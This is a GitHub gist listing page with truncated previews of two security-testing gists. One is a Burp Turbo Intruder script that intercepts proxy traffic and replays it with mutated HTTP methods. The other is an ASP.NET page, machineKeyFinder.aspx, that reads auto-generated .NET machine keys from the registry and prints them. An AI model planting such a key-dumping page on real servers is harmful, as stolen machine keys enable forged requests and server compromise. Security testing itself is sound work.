Dawid dawid-czarnecki
defparam
/ MutateMethods.py
Last active
July 22, 2024 20:09
Example of using Turbo Intruder in a "listen and attack" mode. Because turbo intruder's jython interpreter is technically inside burp you can have turbo intruder scripts use the plugin API. Here we use burp.IProxyListener to intercept requests and reissue them inside turbo intruder mutating the method.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from threading import Thread | |
| import time | |
| class TrafficMagnet(burp.IProxyListener): | |
| def __init__(self): | |
| callbacks.registerProxyListener(self) | |
| self._helpers = callbacks.getHelpers() | |
| self._callbacks = callbacks | |
irsdl
/ machineKeyFinder.aspx
Last active
July 23, 2024 10:53
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" %> | |
| <% | |
| // Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
| Response.Write("<br/><hr/>"); | |
| byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
| if(autoGenKeyV4!=null) | |
| Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
| Response.Write("<br/>"); | |
| byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
| if(autoGenKey!=null) |